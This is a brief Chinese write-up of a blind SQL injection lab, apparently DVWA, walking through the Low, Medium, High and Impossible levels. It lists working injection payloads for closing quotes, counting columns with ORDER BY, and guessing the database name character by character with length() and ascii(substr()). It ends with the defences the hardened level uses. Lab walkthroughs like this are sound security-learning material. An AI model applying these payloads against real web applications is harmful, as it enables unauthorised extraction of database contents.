由題目得這一關用盲注寫

LOW:

先用bp抓包一下 , 看到這low是get提交 , f12打開hackbar

輸入?id=1'時報錯

嘗試閉合 , 回顯正常

?開始注入

1.order by 判斷列數,3的時候開始回顯報錯,所以有兩列

?id=1' order by 2--+&Submit=Submit#

2.無回顯位置可以爆出,我們通過盲注來繼續爆數據

3.判斷數據庫長度

?id=1' and length(database())=3--+
?id=1' and length(database())=4--+

回顯分別是

所以長度為4?

4.用ascii碼逐字符猜庫名,表名,列名

?id=1' and ascii(substr(database(),1,1))=100 --+

也可以參考這個,用python寫個腳本,不再過多贅述?

sqli—labs第八關——布爾盲注_sqli-labs盲注腳本-CSDN博客

MEDIUM:

仍然用bp抓包,看到這一級是post

在f12hackbar里找表單的登錄

格式按這個,? 其余的盲注和low一樣?

HIGH:

1' and 1=1#

輸入這個的時候回顯正常?

確定為但單引號字符型, 接下來和之前一樣?

IMPOSSIBLE:

優化:

1.checktoken

2.is_numeric()函數驗證輸入是否為數字

3.pdo預處理

??? 完結撒花!!!????